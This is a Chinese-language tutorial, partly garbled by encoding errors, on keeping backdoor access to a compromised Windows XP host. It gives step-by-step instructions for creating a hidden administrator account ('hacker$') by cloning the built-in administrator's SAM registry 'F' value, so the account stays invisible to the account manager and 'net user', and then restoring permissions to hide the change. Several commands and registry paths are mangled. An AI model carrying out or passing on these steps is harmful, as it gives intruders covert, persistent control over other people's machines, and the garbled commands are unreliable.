黑客入侵后，一般都是要給自己留下一個后門，最常見的方法就是創(chuàng)建一個隱藏的管理員賬號，這個管理員賬號是事實(shí)存在，但是在賬戶管理中卻又無法查看到。這是怎么回事呢？對regedit.exe大家都很熟悉，但卻不能對注冊表的項鍵設(shè)置權(quán)限，而regedt32.exe最大的優(yōu)點(diǎn)就是能夠?qū)ψ员淼捻楁I設(shè)置權(quán)限。xp的帳戶信息都在注冊表的HKEY_LOCAL_MACHINE\SAM\SAM鍵下，但是除了系統(tǒng)用戶SYSTEM外，其它用戶都無權(quán)查看到里面的信息，因此我首先用regedt32.exe對SAM鍵為我設(shè)置為“完全控制”權(quán)限。這樣就可以對SAM鍵內(nèi)的信息進(jìn)行讀寫了了。具體步聚如下： 
　　假設(shè)我們是以超級用戶administrator登錄到開有終端服務(wù)的肉雞上的，首先在命令行下或帳戶管理器中建立一個帳戶：hacker$，這里我在命令行下建立這個帳戶netuserhacker$Content$nbsp；1234/add。 
　　接下來在開始/運(yùn)行中輸入：regedt32.exe并回車來運(yùn)行regedt32.exe。選中HKEY_LOCAL_MACHINE\SAM\SAM后打開“編輯”菜單點(diǎn)“權(quán)限”以后會彈出窗口點(diǎn)添加將我登錄時的帳戶添加到安全欄內(nèi)，這里我是以administrator的身份登錄的，所以我就將administrator加入，并設(shè)置權(quán)限為“完全控制”。這里需要說明一下：最好是添加你登錄的帳戶或帳戶所在的組，切莫修改原有的帳戶或組，否則將會帶來一系列不必要的問題。等隱藏超級用戶建好以，再來這里將你添加的帳戶刪除即可。 
　　再點(diǎn)“開始”→“運(yùn)行”并輸入”regedit.exe”回車，啟動注冊表編輯器regedit.exe。打開鍵：HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\userames\hacker$” 
　　將項hacker$、00000409、000001F4導(dǎo)出為hacker.reg、409.reg、1f4.reg，用記事本分別打這幾個導(dǎo)出的文件進(jìn)行編輯，將超級用戶對應(yīng)的項000001F4下的鍵”F”的值復(fù)制，并覆蓋hacker$對應(yīng)的項00000409下的鍵”F”的值，然后再將00000409.reg與hacker.reg合并。 
　　在命令行下執(zhí)行netuserhacker$Content$nbsp；/del將用戶hacker$刪除：netuserhacker$Content$nbsp；/del。 
　　在regedit.exe的窗口內(nèi)按F5刷新，然后打文件-導(dǎo)入注冊表文件將修改好的hacker.reg導(dǎo)入注冊表即可。到此，隱藏的超級用戶hacker$已經(jīng)建好了，然后關(guān)閉regedit.exe。在regedt32.exe窗口內(nèi)把HKEY_LOCAL_MACHINE\SAM\SAM鍵權(quán)限改回原來的樣子(只要刪除添加的帳戶administrator即可)。 
　　不過，需要注意的是隱藏的超級用戶建好后，在帳戶管理器看不到hacker$這個用戶，在命令行用“netuser”命令也看不到，但是超級用戶建立以后，就不能再改密碼了，如果用netuser命令來改hacker$的密碼的話，那么在帳戶管理器中將又會看這個隱藏的超級用戶了，而且不能刪除。